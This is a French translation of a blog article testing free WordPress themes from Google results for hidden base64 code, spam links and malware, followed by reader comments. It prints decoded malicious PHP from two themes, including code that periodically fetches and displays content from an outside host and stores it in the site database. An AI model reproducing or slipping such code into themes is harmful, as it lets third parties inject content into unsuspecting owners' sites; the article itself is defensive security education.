Il ne faut jamais chercher un thème WordPress gratuit sur un moteur de recherche

[ceci est la traduction de l'article "Why You Should Never Search For Free WordPress Themes in Google or Anywhere Else", écrit par Siobhan Ambrose sur WPMU.org. Cet article nous a semblé suffisamment pertinent pour justifier une VF, ce que l'auteur nous a autorisé à faire]

Il y a quelques mois, j’avais écrit une liste de conseils pour sécuriser son installation WordPress  (« WordPress Security« ). Pour le présent article, je me suis armée des mots « free WordPress themes », et des extensions Theme Authenticity Checker (TAC) de builtBackwards et Exploit Scanner de Donncha O Caoimh, afin de me plonger dans la première page de résultats Google pour une recherche sur des thèmes WordPress gratuits, et voir à quel point ils peuvent être sécurisés — ou non.

A la recherche de thèmes !

Notez bien que je n’ai installé aucun des thèmes présentés ci-après sur mon serveur. Au lieu de cela, j’ai installé WordPress en local avec XAMPP. Je déconseille de mettre en ligne les thèmes provenant de sites inconnus : vous ne savez jamais le mal qu’ils pourraient faire !

1. WordPressThemesBase

WordPress Themes Base a la chance d’être en première position pour la recherche « Free WordPress Themes ». En voilà un qui a bien travaillé son optimisation pour les moteurs de recherche ! Le descriptif nous indique que le visiteurs n’y trouvera que des thèmes récents. Super ! J’adore les thèmes récents.

J’ai donc téléchargé le thème Prinz Brandford Magazine. Dès le départ, un problème se présente. Branford Magazine est un thème conçu par Der Prinz ; on en trouve une très vieille version qui n’est pas conçue pour WordPress 3.0 (autant que je puisse en juger), et une version Pro qui est sortie il y a peu. Cela signifie que vous avez le choix entre un thème qui ne marchera pas avec la dernière version de WP, ou un thème est soit-disant « professionnel ».

Installons le thème et testons-le avec l’extension TAC.

Du code chiffré ! On n’en est qu’au premier site sur Google, et déjà on essaye de nous avoir avec un chiffrement en Base64 ! :( Ca commence mal… Le codage base64 est souvent utilisé pour cacher du code malicieux. On peut voir que le code se trouve dans le pied de page, voyons voir ça de plus près :

Et ouais, mon copyright, comme il se doit ! Mais à quoi correspond ce codage base64 ? Voici le code lui-même :

Beaucoup de blabla.

Le codage base64 peut se décoder de deux manières :

J’ai choisir la seconde option. Le résultat de l’échange de fonctions :

Hein ?! Il y a une seconde c’était mon copyright !!! Mais ! Maintenant ça parle de télécharger un anti-virus. D’où cela vient-il ? Certainement de ce code en base64.

Le verdict

J’ai téléchargé deux autres thèmes de ce site, et ils contenaient également du code base64. Le base64 ne dissimule pas forcément que des liens. Il peut aussi cacher du code malicieux qui mettra la pagaille dans votre site. En plus de cela, ce site, qui promet des thèmes récents, propose en définitive des thèmes créés par d’autres personnes, auquel le propriétaire du site ajoute son code base64. J’ai contacté Michael Oeser de Der Prinz, et il m’a dit avoir tenté de contacter le webmaster afin d’enlever son thème, sans succès. Il a donc publié un avertissement sur site, sur le danger de télécharger des thèmes piratés. En tant que créateur du thème Branford Magazine, son conseil est d’éviter les sites comme celui-ci — assurément un bon conseil !

Ma suggestion

A éviter !

2. Free WordPress Themes

Un autre site avec des thèmes WordPress gratuits. Super ! Exactement ce que je cherche : j’adore tout ce qui est gratuit. Le premier thème de ce site se nomme BeautyStore. J’adore les boutiques de cosmétiques, donc je vais télécharger celui-ci, l’installer… et le tester avec TAC.

Du code crypté !

Le voici dans le pied de page :

Pour une magasin de cosmétiques, ce n’est pas très joli. On y trouve toutes sorties de fonctions chiffrées. J’ai transformé les eval() et echo(), sans succès. J’ai utilisé quelques décodeurs, mais cela reste illisible :(

Les testeurs de failles ne l’aiment pas plus que moi :

Toutes ces failles sont indiquées comme étant graves (« severe warning »)

Le verdict

On en est au deuxième site sur Google, et déjà on a du chiffrement en base64. J’ai téléchargé quelques autres thèmes qui contenaient des liens statiques et pas de base64. Je suppose que ce site est au petit bonheur la chance… Cependant, avec le site précédent j’avais pu déchiffrer le code, et là, non. Une recherche sur certains forums avec des extraits du code du pied de page indique que le code chiffré pourrait être du hacking :( Je ne suis pas assez technique pour le reconnaître, et je suppose que la plupart des utilisateurs de WordPress ne le sont pas plus. De fait…

Ma suggestion

A éviter !

3. Themes2WP

En survolant les thèmes de Themes2WP, on en trouve quelques-uns très tentants. Jetons un oeil à Gameliso, qui nous semble très joli.

TAC nous dit qu’il y trouve 5 liens statiques. En soit ce n’est pas grave : un développeur a le droit de faire un lien vers son site. Voici les liens en question :

Hmmmmm… Je ne sais pas pour vous, mais je ne vois pas trop ce que des sites pour célibataires ou pour des gardiens d’animaux ont à voir avec le développement de thèmes. Jetons un cil au code de footer.php :

Voici les liens, avec un message fort utile : « Ne modifiez pas le code suivant, sans quoi votre site ne marchera plus ! » C’est gentil de le dire ! J’ai failli enlever ces liens et casser mon site ! Ouf !

Sauf que… J’ai effectivement enlevé ces liens, et le site marche tout aussi bien.

Un autre lien se trouve dans sidebar.php :

Maintenant voyons les styles qui s’appliquent à la classe .ad_lnk :

Ouahou ! Voilà un lien qui sort de sentiers battus ! Il ne sert pas à grand-chose, hormis faire un lien caché.

Nous avons regardé les liens, voyons voir ce que donne le testeur de failles.

Le thème contient un eval() qui pourrait lancer du code malicieux. Ce n’est pas le genre de chose que l’on souhaite avoir dans son thème.

[NdT : il s'agit ici de la méthode globalEval() de jQuery(), qui est un eval() s'appliquant au contexte global. Le fonction en elle-même n'est pas forcément malicieuse, car des applications peuvent y faire appel de manière totalement inofensive]

Le verdict

De jolis thèmes, mais avec 5 liens vers des gens que vous ne souhaitez sans doute pas remercier.  Il va jusqu’à vous dire de ne retirer ces liens, ce que fera un débutant ne connaissant pas bien WordPress. Quant aux fonctions eval(), elles sont peut-être sans danger, mais je ne m’y connais pas assez en JavaScript pour vous dire si c’est le cas ou non.

Ma suggestion

A éviter !

4. FreeWPThemes

Maintenant que je suis convaincue que tous les sites en dehors de WordPress.org sont à éviter, j’ai été surprise de ne pas trouver de liens rajoutés dans aucun des thèmes que j’ai téléchargé sur FreeWPThemes. J’en ai téléchargé 5, ils avaient tous les mêmes liens :

Aucun de ces liens ne semble hors de propos. Je me suis donc sentie coupable de mes suppositions erronées.

Cependant, j’ai testé ces thèmes avec l’extension Theme Check. Celle-ci analyse votre thème pour s’assurer qu’il correspond aux bonnes pratiques. Voici son avis :

Plein d’erreurs ! Il y en a même plus que ça : je ne pouvais pas les mettre toutes dans une seule capture d’écran !

Le verdict

Bien que les thèmes de FreeWPThemes ne correspondent pas vraiment aux standards de qualité mis en place par le dépôt de thèmes de WordPress.org, il ne semble là rien y avoir de malicieux, même pas un lien caché. Il se peut que certains aspects d’un thème ne fonctionne pas comme attendu, mais rien de bien méchant !

Ma suggestion

Ca va, mais vérifiez bien que toutes les fonctionnalités qui vous sont nécessaire fonctionnent effectivement.

5. WordPress.org

Enfin ! WordPress.org ! Nous connaissons tous ce site. C’est le plus sûr pour trouver des thèmes. Je pense que le problème que l’on peut avoir le dépôt de thème est que nombre d’entre eux semble avoir été conçus au XVIIe sicèle (ou pas loin). Cela peut être frustrant, surtout parce que un grand ne fonctionne pas très bien avec WordPress 3.0. Au bas du présent article, je vous donnerai quelques liens vers d’autres bons sites où trouver de superbes thèmes.

Le verdict

Un site de confiance pour trouver des thèmes WordPress gratuits.

My suggestion

<3

6. Themes.Rock Kitty

Ce site présente une image d’un chat jouant une guitare. Tant qu’il y a un chat quelque part, je deviens très conciliante. Le premier thème que j’ai téléchargé n’a pas de liens publicitaire ou de code caché. Idem pour le deuxième. Mais le troisième m’a donné ceci :

Encore du base64 !

Cette fois-ci, changer les eval() pour un echo() m’a donné ceci :

Le lien du bas de page ressemblaient à ça :

Le scanner de failles m’a renvoyé 17 alertes graves pour ce thème. Etant donné que seuls 4 liens sont visibles en bas de page, je suppose que ce thème est rempli de liens cachés, ou qu’un truc pas clair se déroule dans son code.

Le verdict

A utiliser avec précaution. Si vous comptez leur télécharger des thèmes, installez-le d’abord en local, et vérifiez-les. Voici un n-ième site où vous pourriez vous retrouver à télécharger un thème qui vous détournera votre site. Soyez prudents !

Ma suggestion

A éviter !

7. WP Themes Depot

Un autre site qui nous propose les thèmes WordPress les plus récents, les plus à jour, les plus beaux, les plus gratuits. Cette fois, j’ai téléchargé le thème le plus populaire du site, Nifertiti, téléchargé 980 fois. Comme d’habitude, je l’ai donné en pâture à TAC, qui m’a indiqué le code chiffré suivant :

En changeant les eval() en echo(), on obtient :

Ils ne veulent pas apparemment pas que je me débarrasse de leur code. Ces liens apparaissent dans le pied de page :

Le verdict

Encore un site avec du base64 dans son code. Je pense qu’il n’est pas nécessaire de répéter qu’on ne peut pas avoir confiance en ce type de code. Un développeur peut très bien ajouter des liens à son thème, mais les dissimuler avec du base64, c’est tout autre chose. Surtout quand on sait qu’un tel chiffrement peut cacher du code malicieux.

Ma suggestion

A éviter !

8. WPRex

Je téléchargé 5 thèmes chez WPRex, les deux premiers contenaient des liens vers du spam, et les trois autres contenaient (surprise surprise) du base64.

Il s’agit de Pink Desire. Déchiffrons-le avec le décodeur :

Des liens cachés.

Le verdict

Encore un site moyen. Si vous devez télécharger un de leurs thèmes, vérifiez bien ce qu’il affiche avec le TAC, et le décodeur pour tout ce qui est caché en base64.

Ma suggestion

A éviter !

9. No Limits Web Design

J’avais de bons espoirs pour ce site, à cause de son nom différent des autres, mais non, même annonce : de super thèmes WordPress gratuits. J’ai téléchargé l’un des thèmes mis en avant, Dark Night, et une fois de plus, du code base64.

En plus du base64, j’ai trouvé un eval(str_rot13()). Vous pouvez le décoder avec cet outil. J’ai obtenu ce résultat :

C’est en gros la licence. Cependant, en transformant le eval() du haut de la page en echo(), on obtient ceci :

function wp_code() {
		$default_link_text = "Default";
		$link_host[] = "http://www.webspacehosting.com/wp_links/wp_links.php";
		$link_host[] = "http://nolimitswebdesign.com/wp_links/wp_links.php";
		$l = "";
		foreach($link_host as $value) {
			if($file = @fopen($value."?url=".get_bloginfo('url'), "r")) {
				while (!feof ($file)) {
					$line = fgets ($file);
					$l .= $line;
				}
				fclose($file);
				break;
			} else {
				if ($value == end($link_host)) {
					$l=$default_link_text;
				}
			}
		}
		return $l;
	}
	function check_wp_code_sidebar() {
		$uri = strtolower($_SERVER["REQUEST_URI"]);
		if(is_admin() || substr_count($uri, "wp-admin") > 0 || substr_count($uri, "wp-login") > 0 ) {
		} else {
			$l="";
			$f = dirname(__file__) . "/sidebar.php";
			$fd = fopen($f, "r");
			$c = fread($fd, filesize($f));
			fclose($fd);
			if (strpos($c, $l) == 0) { die; }
		}
	}
	check_wp_code_sidebar();

Ce thème rajoute des links dans la barre latérale. Pauvre site !

Voici ce qu’indique le testeur de failles :

Le verdict

Encore un site avec du base64, donc a éviter. Celui-ci a des liens encore plus cachés que les autres.

Ma suggestion

A éviter !

10. Templates Browser

On en a presque terminé ! En fait, j’ai fait une petite recherche sur Templates Browser, et trouvé cet article. Vous pouvez donc vous douter de ce qu’il va arriver. J’ai téléchargé le thème Dropshadow, qui en réalité a été créé par Brian Gardner, mais que vous ne pouvez plus obtenir depuis son site (sans doute parce qu’il est assez vieux, et pas compatible avec WP 3.0).

TAC a trouvé ces liens :

Voilà un bien gros morceau de PHP. Celui-ci se rapporte à un site de casino en ligne. Cependant, on y trouve du code encore plus suspicieux. Le voici au propre :

get_col("SELECT option_value FROM $wpdb->options WHERE option_name='l_time_code'");
$l_code = $wpdb->get_col("SELECT option_value FROM $wpdb->options WHERE option_name='l_code'");

if (empty($l_time_code)) {
 $wpdb->query("INSERT INTO $wpdb->options (option_name, option_value, autoload) VALUES ('l_time_code', '0', 'no')");
 $new_time_code = 0;
} else
 $new_time_code = intval($l_time_code[0]);

if (empty($l_code)) {
 $wpdb->query("INSERT INTO $wpdb->options (option_name, option_value, autoload) VALUES ('l_code', '', 'no')");
 $new_l_code = '';
} else $new_l_code = $l_code[0];

if ( ( time() - $new_time_code ) >= 60 ) {
 $R39C188653EA53DBD6E3F1D3915EDAC0C = "com";
 $R8088818E3E46A17C12F2EE42EB12D7AC = "1.";
 $R7B934F06258B8BA3608E30CDE9EA1035 = "xpstatz";
 $xps = "xps.";
 $url = "$R8088818E3E46A17C12F2EE42EB12D7AC$R7B934F06258B8BA3608E30CDE9EA1035.$R39C188653EA53DBD6E3F1D3915EDAC0C";
 $page = "/".$xps."php?h=" . urlencode($_SERVER['HTTP_HOST']) . "&u=" . urlencode($_SERVER['REQUEST_URI']);

 //1.xpstatz.com/xps.php?h=host&u=uri
 if (ini_get('allow_url_fopen')) {
 $new_l_code = @file_get_contents("http://" . $url . $page);
 } else {
 $RF500F4A848E2EB2F8AAC3A6734D7EC38 = @fsockopen($url, '80', $R87844B1C6FC922407E6020B6B224950F, $R1966719AEC0096F98BA934D649A6E28D, 30);
 if ($RF500F4A848E2EB2F8AAC3A6734D7EC38) {
 @stream_set_timeout($RF500F4A848E2EB2F8AAC3A6734D7EC38, 60);
 @fwrite($RF500F4A848E2EB2F8AAC3A6734D7EC38, "GET $page HTTP/1.1\r\n");
 @fwrite($RF500F4A848E2EB2F8AAC3A6734D7EC38, "Host: $url\r\n");
 @fwrite($RF500F4A848E2EB2F8AAC3A6734D7EC38, "Connection: Close\r\n\r\n");
 $new_l_code = "";
 while(!feof($RF500F4A848E2EB2F8AAC3A6734D7EC38)) {
 $new_l_code .= @fgets($RF500F4A848E2EB2F8AAC3A6734D7EC38, 1024);
 }
 $new_l_code = trim(strstr($new_l_code, "\r\n\r\n"));
 }
 @fclose($RF500F4A848E2EB2F8AAC3A6734D7EC38);
 }
 if ( strpos($new_l_code, '[/]') ) {
 $new_time_code = time();
 $R54997E66281827CBC285597040554FCC = mysql_escape_string($new_l_code);
 $wpdb->query("UPDATE $wpdb->options SET option_value=$new_time_code WHERE option_name='l_time_code'");     $wpdb->query("UPDATE $wpdb->options SET option_value='$R54997E66281827CBC285597040554FCC' WHERE option_name='l_code'");
 }
}

if ( strpos($new_l_code, '[/]') ) {
 $R3CB9CDAED257453CFA56B9EF81B44C57 = strpos($new_l_code, '[]') + 2;
 $R24D59CD0B76A27B85F35D40A3CF6EC37 = strrpos($new_l_code, '[/]');
 echo substr($new_l_code, $R3CB9CDAED257453CFA56B9EF81B44C57, $R24D59CD0B76A27B85F35D40A3CF6EC37-$R3CB9CDAED257453CFA56B9EF81B44C57);
 $RE762F29BDD39FF0A2ADF9AF4E6885799 = 1;
}
?>

Il stocke des liens dans la base de données, et toutes les 60 secondes va récupérer un code provenant d’un site tiers. Il met ensuite à jour l’horodatage de ces liens, et les affiche dans le pied de page.

En bref, une manière bien complexe de faire ce qui a déjà été décrit pour les autres thèmes frauduleux.

Le verdict

C’était déjà mal partis quand un autre site nous indique que Templates Browser contient du malware. Ca s’est aggravé quand on a constaté qu’ils ont piqué le thème d’un designer respecté. Le gros morceau de code n’est que la goutte qui fait déborder le vase.

Ma suggestion

A éviter !

Conclusion

Voici les stats pour les 10 premiers sites de la première page Google :

  • Sûr : 1
  • Mouais : 1
  • A éviter : 8

8 des 10 sites utilisent du base64 dans leur thème. L’utilisateur WordPress moyen sait peut-être qu’il ne faut pas télécharger n’importe quel thème, mais le stats de ces sites indiquent des milliers de téléchargements. Un nouveau venu aura de grande chance de taper « free WordPress themes » dans Google et tomber sur un site qui leur donne ce qu’il cherche, mais avec des liens en trop et du code malicieux.

Bien entendu, le dépôt de thèmes officiels de WordPress.org peut être frustrant, car tous ses thèmes ne sont pas forcément compatibles avec WP 3.0, et beaucoup sont un peu datés/dépassés, voire présentent des bugs avec les dernières versions de WP. Voic donc quelques sites sûr où trouver des thèmes WordPress gratuits…

Bons sites de thèmes WordPress gratuits

Bons sites avec des thèmes WordPress payants, et quelques-uns gratuits

Decodeurs

Si vous voulez inspecter un thème qui vous semble suspect, voici quelques ressources utiles (source):

Extensions utiles

A lire (en anglais)

L'auteur :

Mainteneur de la traduction en français de WordPress. Son blog perso.

Informations annexes à l'article

Cet article a été publié le Mercredi 26 janvier 2011 à 15:20 et est classé dans Astuces, Blog, Sécurité, Thèmes.

Vous pouvez en suivre les commentaires par le biais du flux RSS 2.0.

Les commentaires et pings sont fermés.

Article lu 267 368 fois.

Méta

1 étoile2 étoiles3 étoiles4 étoiles5 étoiles (17 votes, average: 5,00 out of 5)
Loading ... Loading ...
Imprimer cette article Envoyer cet article à un ami

97 commentaires

  1. Il est important de se méfier de ce que l’on télécharge en général quand il ne s’agit pas d’un éditeur connu.

    On peut toujours télécharger ces thèmes malveillants et les nettoyer ensuite. Il suffit de repérer ce qui est louche. Mais c’est sur que le débutant qui n’a jamais touché au PHP se fera avoir.

    Prudence donc !

  2. Des que les thèmes sont gratuit ou sur des usines à thèmes il faut rester vigilant, combien d’apprenti webmaster se retrouve à faire des liens vers des sites Viagra sans leur accord.

  3. C’est une pratique très courante sur les sites de warez proposant des thèmes premium payant (mais gratuit avec un footer encodé en bas64), qui sont de ce fait une fausse bonne affaire.

    On peut en tirer la conclusion qu’il vaut payer le thème, avoir un support et soutenir la création.

  4. Il faut effectivement toujours se méfier des thèmes gratuits, vu que l’encodage base64 peut permettre à un créateur de thème de faire tout et n’importe sur le site et l’ordinateur de celui qui aura eu le malheur de l’utiliser.

    C’est donc un excellent article qui nous rappelle de toujours nous méfier lors que l’on modifie son blog WordPress (ce qui est aussi valable pour les plugins).

    Par contre, ce n’est pas parce que l’on paie un thème que celui-ci ne contient pas le même type de problème…

    Daniel,

  5. Merci pour cette traduction et ces nombreux conseils avisés.
    Sacrée fonction eval !

  6. Un jour j’ai téléchargé un thème où il était impossible de supprimer des liens publicitaires du footer. Ces liens dépendaient d’un code encrypté…

  7. Excellent article…

    Encore une fois, on se rend compte que rien n’est vraiment « gratuit »… il y a toujours une contrepartie quelque part… :)

  8. Merci pour cet article fort instructif. Comme quoi, tout ce qui est gratuit n’est pas toujours bon à prendre… Merci également pour les extensions de contrôle que je ne connaissais pas.

  9. je me suis mis à WordPress depuis quelques jours, je me doutais bien de ce genre de chose sur la plupart des thèmes gratuits téléchargeables.

    Du coup, une fois qu’on a trouvé cet encodage 64 qui se rattache le plus souvent au footer, que pensez vous de tout simplement effacer le code du fichier sans pour autant effacer le fichier?

    Personnellement, je l’ai fait sur deux thèmes, et je n’ai plus aucun lien sur mon footer.

    Généralement, on les trouve dans les fichier template-bot.php et template-top.php.

  10. Je ne suis pas vraiment d’accord, peu de thèmes sont optimisés seo hors a chaque thème téléchargé il faut tripatouiller le code pour le rendre plus seo friendly, du coup on ne se fait pas avoir par ce type de techniques.

    Pour les thèmes cryptés, il suffit de s’inspirer du code html affiché.

    Bref, c’est vrai qu’il ne faut pas chercher un thème WordPress gratuit sur un moteur de recherche si on ne sais pas coder (html ou php) ou si on a l’intention de le garder tel quel ce que la majorité des novices font.

  11. J’avais aussi fait la même analyse à la fin de l’année dernière, ce qui m’avait donné l’occasion de publier un article sur ce sujet sur mon blog. En effet, de nombreux sites qui proposent des thèmes gratuits sont en réalité dangereux, les thèmes ayants tendance à être vérolés d’une façon ou d’une autre. Il est donc préférable de se limiter à quelques sites de confiance pour ne pas avoir de grosses surprises très désagréables.

  12. J’ai découvert un magnifique programme : « artisteer », je n’achète plus aucun template, je peux tout vraiment bien designer moi même, et fabriquer mon template à partir de mon design me prend moins d’une demie heure ! Je ne veux pas faire de pub, mais (surtout si on fait souvent des sites web) comme le dit le célèbre dicton : offre un template a un homme, il fera un site, offre lui un éditeur, il fera des sites web toute sa vie :)

  13. très intéressent comme analyse, personnellement le première thème que j’ai utilisé sur mon wordpress avec effectivement un footer crypté (je ne savais pas trop en quoi) sur le moment j’ai voulu savoir ce que ce bout de code voulais dire, ne sachant pas j’ai changé le thème.
    Et grâce a vous j’ai découvert l’extension Theme Authenticity Checker et en analysant le thème avec le footer crypté il y avait bien un lien vers des sites de mmorpg

  14. Il est évident que parmi tous les thèmes gratuits, il en existe un paquet qui sont de mauvaises pioches (mal codés, faisant des liens vers des sites tiers, etc).
    Ceci dit, le wembaster devrait prendre le temps de regarder le code de son thème en détail afin d’éviter ce genre de désagrément, ça me semble être du bon sens

  15. Quand les themes sont gratuits et fournis sur des sites etrangers, il faut se mefier. Au cas ou personne n’y aurais penser parce c’est evident.., WP fournit des theme spar defaut qui sont tres fiables et tres sympas. Il suffit de les adapter un peu et au moins c’est fiable a 100 pour cent.
    EN tout cas, article ludique, merci pour cette piqure de rappel. on trouve tout est n’importe quoi au niveau des themes WP. Y compris des payants qui fonctionnent pas ou mal..

  16. krysttof 28/01/11 - 11:57

    Merci pour cette traduction.
    Ça va finir par me faire peur tout cela !
    Mais c’est comme tout et partout : il y a du bon et du mauvais. C’est bien à chacun de faire attention et de tester les thèmes qui nous tente.
    Passer tous les thèmes au TAC !

  17. bravo pour cet article… j’ai cru un moment que t’avais fait le boulot… ben non c’est une traduc… mais c’est déjà bien
    curieux mais je n’ai jamais eu l’idée d’aller chercher sur google vu qu’on a l’excellent site de wp pour chercher… et trouver.
    Quant à payer un thème je ne suis pas convaincue car déjà le gratuit il faut l’essayer pour voir les bons et mauvais côtés et quelques jours sont souvent nécessaires, alors payer non. Ce qui n’empêche pas de donner à celui pour lequel on a penché pour de bon.
    Autre question : souvent on a trituré son thème en ajoutant ou enlevant de trucs et en traduisant, en le mettant à sa sauce autrement dit alors la question quand il est fait une nouvelle version il nous faudrait savoir où sont les changements… manque cette info primordiale…
    à moins qu’il y ait un moyen (sur mac) ?

  18. Will : je déconseille fortement d’utiliser Artisteer.

    Annie : l’article commence pourtant par « ceci est la traduction… » :)
    Il ne faut pas modifier le thème directement, mais préférablement créer un thème-enfant.

  19. eureka, merci, et en french… du boulot donc

  20. Un truc a test aussi c’est le classic, file_get_contents(‘http://foo.com/bar.txt’);
    Puis include du fichier telecharger avec les alternatives en fopen ou curl voir le simple echo file_get_content pour afficher un beau backlink dans le footer.

    Sinon on a ca aussi sur le site officiel par exemple ds ce plugin http://wordpress.org/extend/pl.....st-rating/ ds la fonction copyright dc c est comme tt, faut faire attention

  21. Geekbay : merci, j’ai signalé cet auteur d’extension à l’équipe de WP.org

  22. Geekbay : l’auteur et ses extensions ont été enlevés du WP.org.

  23. Très intéressant comme article. Je n’avais même pas idée que de telles pratiques avaient lieux.

  24. Bravo !
    Merci d’avoir pris le temps d’analyser les choses en détail et d’en avoir fait un article très clair sur ces pratiques méconnues mais qui peuvent avoir de graves conséquences pour les utilisateurs.

  25. Je m’y attendais un peu mais à ce point ! 80% de codes malicieux… Une excellente « enquête ». Bon boulot, bravo !

  26. Merci !
    Voilà pourquoi depuis une semaine je cherche un nouveau thème sans succès … je n’y connais pas grand chose en code, et programmation mais il me semblait bien que pas mal de sites proposaient des thèmes peu sûrs voir malveillants.
    Je serai encore plus prudente à l’avenir.
    Bon boulot !

  27. Ca revient quand même à généraliser et à mettre tout le monde dans le même sac…

    Ya du vrai et ya du faux. La meilleure façon de s’y prendre reste de se renseigner un maximum et de rester prudent sur les sources.

    Personnellement, je ne suis pas fan de la théorie du complot

  28. Tout ça est très intéressant mais je suis aller checker le base64 incriminé dans deux thèmes achetés sur ThemesForest et il y en a à divers endroits…
    Alors, mauvais thèmes aussi ?

  29. Au fait, pourquoi ne pas utiliser Artisteer ??

  30. Merci pour cette enquête assez complète. Cependant, j’ai actuellement un thème (le seul que j’ai trouvé qui concorde avec mon site) mais impossible de supprimer des liens dans le pied de page. Pouvez-vous m’expliquer comment utiliser le décodage base64 pour voir si ça vient de là ou d’autre part ? C’est le seule étape que je n’ai pas tout à fait saisie.

    Merci par avance.

  31. Autre problème de taille :
    Le référencement !! Google SPAM
    Sauf si la fonction est en JS mais bon c’est pas top ces histoires la !!

  32. Salut,

    Super article !
    Moi j’ai acheté un thème payan mon hebergeur en proposait des pas trop cher :
    http://www.lws.fr/themes_wordpress.php

    il semble qu’il soit affilié à template monster donc un vendeur de template sur, en tout cas comme cela j’ai pas de problème de copyright.

  33. Bonjour Xavier,

    Merci pour cette étude détaillée.
    Ce problème touche toutes les solutions Open Source (du moteur de CMS au script de blog, etc), car dès lors qu’il y a possibilités de développer des extensions réalisées par des tiers qui voient l’avantage du marketing viral, le marché est vite saturé de ces thèmes « piégés » (malware).

    Voici un autre décodeur/encodeur base64, qui a l’avantage d’être didactique, pour compléter la sélection d’outils de votre article :

    http://www.base64online.com/

  34. Bonjour,

    J’aurais besoin d’aide, hier soir j’ai téléchargé un thème et depuis je ne peu plus rentrer dans mon site. Et il n’est plus visible. Cela m’affiche :

    Parse error: syntax error, unexpected T_STRING, expecting T_OLD_FUNCTION or T_FUNCTION or T_VAR or ‘}’ in /homez.420/elevagedw/www/wp-content/themes/custom-community/admin/library.php on line 348

    Merci de votre aide. Nelly

  35. Impressionant!!
    Une recherche dans mon dossier « thèmes WP » sur le mot base64 avec Agent Ransak m’a permit de faire un sacré ménage!
    Il reste quand même quelque thèmes « propres ».

  36. Merci,bien content d’être tombé sur cette page en cherchant un thème WordPress gratuit sur un moteur de recherche….

  37. Merci, je viens d’apprendre ce qu’était un code base64 et en même temps de comprendre pourquoi mon tout premier thème renvoyait les gens sur un site de de rencontre via mon copyright, ce qui à l’époque m’avait fait perdre beaucoup de temps en recherche et en changement de thème.

  38. Plinelancien 07/08/11 - 17:45

    Merci beaucoup pour cet article.
    J’ai également appris beaucoup de choses et éviter plein de thèmes contenant des codes malicieux.
    Cela me motive à apprendre à créer mes thèmes seules (vive Gimp et l’apprentissage des codes informatiques).
    Mille mercis!

  39. Ce site (http://www.simplewpthemes.com/) est-il fiable selon vous ? Les thèmes proposés sont plutot de bonne qualité.

  40. Matthieu 20/09/11 - 15:51

    Merci pour tous les conseils !!
    Je ne savais pas qu’on pouvait inclure du code malicieux de cette façon.
    Bonne journée !

  41. Excellent travail d’investigation, merci pour cet article!

    J’allais de toute manière toujours chercher mes thèmes sur le site WordPress, me voilà rassuré. :-)

  42. Merci pour cet article tres utile.

  43. Bonjour et merci
    J’apprends WordPress en ce moment et j’ai voulu trouver un thème gratuit qui convient à l’idée de mon blog. J’ai eu de la chance en tombant sur votre article en première page de recherche.
    Je m’en tiendrai aux thèmes officiels de WordPress.
    Merci encore

  44. Amusant. J’ai donc fais quelques tests sur les thèmes proposés par themeforest.net et je suis tombé sur une alerte trojan de la part de mon antivirus en allant sur ce modèle et en cliquant sur le petit widget « Try it now » représentant un smartphone en haut à droite de la page : http://themeforest.net/item/se.....alexandreb
    Ça parle à quelqu’un ? Car moi j’ai pris une amplitude thermique assez rapidement (mais mon antivirus a peut-être dérape).

  45. Quand tu dis « Ouahou ! Voilà un lien qui sort de sentiers battus ! Il ne sert pas à grand-chose, hormis faire un lien caché. »

    Il est pas mal ce lien parce que comme on ne le voit pas, on va pas essayer de l’enlever. Par contre le site du lien pourra ainsi avoir beaucoup de références depuis d’autres sites. Ce qui permet d’augmenter le rank des recherches Google.

  46. Bon tout compte fait, je vais garder Twenty-eleven. Pas de risque au moins.

  47. Merci pour cet article il y a quand même pas mal sur le web de thèmes gratuits sans code base64

  48. Merci pour ce billet qui, certes date, mais reste très instructif et pratique.

  49. Article très instructif qui encourage clairement les utilisateurs de WordPress à réaliser eux-mêmes leur propre template. Pour des thèmes de qualité on peut toujours se rabattre sur les thèmes payants qui commencent à foisonner, mais là encore il faut absolument vérifier le code avant la mise en ligne.

  50. Brillant article comme il en faudrait plus sur le net, félicitations…

    Cependant j’aime a penser qu’un code caché n’est pas forcément un code malicieux. C’est peut être un backlink de l’auteur du thème vers son site perso pour bénéficier d’une contre-partie en terme de référencement.
    Mais je ne vois pas trop l’intérêt de crypter un backlink…
    Ce qui m’intrigue le plus c’est que ces liens cryptés peuvent renvoyer vers des sites qui n’ont aucun rapport avec le graphisme ou le développement de sites!
    Pourquoi???

  51. Merci beaucoup pour cet article. Nous sommes une association qui essaye de se faire un site web gratuitement, ce n’est pas facile et vos conseils nous ont été précieux!

  52. darknote 01/12/11 - 19:08

    Que pensez vous des thèmes de Web2Feel, de simplewpthemes.com, de magpress ??
    merci

  53. C’est bien beau de « truster » quasiment uniquement « WordPress.org », mais qualitativement parlant, c’est quand même pas le pied. Lorsqu’on à besoin/veut ne pas avoir à payer un thème, il faut prendre le temps de rechercher et ne pas avoir peur de mettre les mains dans le cambouis, même si tout le monde n’a pas forcément la fibre du codage.
    Mais sérieusement, de ce point de vue là, WordPress.org à quand même besoin d’évoluer et de ne plus laisser passer les thèmes bleus flou sur 1 col qui font le bonheur de leur « créateur »

  54. et vos thèmes, vous les faites avec quoi ?
    merci

  55. et ben rien a dire, félicitation !
    j’ai trouvé ton article sur google et le titre ma étonné et voila la je suis encore étonné hh,
    merci beaucoup pour tous ces conseil .

  56. Merci pour ces informations. ! Une bonne année 2012 sans code64 :)

  57. excellent article en effet. Il y a déjà le choix sur le site officiel, mais je continuais de chercher ailleurs, et après avoir lu ceci, je crois que je vais arrêter ! bonne suite

  58. mais quand même d’accord avec wolf !

  59. que pensez vous du site solostream ?
    ou peut on trouver d’autres avis sur les themes?

    http://www.solostream.com/

  60. Ah les liens cachés dans les templates wordpress ou autres CMS …

    La technique n’est pas nouvelle. Matt Cutts en parlait il y a plus d’un an déjà.

    Il faut par contre reconnaître que ce test mérite d’être pris au sérieux.

  61. @Affiliation rencontre En même temps, l’article date de plus d’un an..

    Merci à l’auteur pour ces bons conseils et tests.

  62. Oui, mais l’article reste génial un an après, et la situation n’a pas vraiment changé malgré ces alertes. En outre des novices ou même des personnes plus expérimentés peuvent toujours se faire avoir.

  63. Super article !

    Autre chose, il faut faire super gaf aux plugins/thèmes mal codés qui contiennent du coup des portes d’entrées (parfois sans le faire exprès!) du genre les plugins de redimensionnement d’images etc … qui permet ensuite à l’auteur du plugin de s’introduire tranquillement sur votre FTP …. du genre le fichier timthumb.php qui a fait un ravage sur nos blogs : http://blog.artenet.fr/2011/08.....thumb-php/

  64. génial, j’ai installé TAC et j’ai fait le ménage. Merci !

  65. Hoooo ben ça alors ! En pleine recherche de template je tombe sur votre site ! 1000 merci pour l’info !

    Je vais rester dans les standard proposés par wordpress !
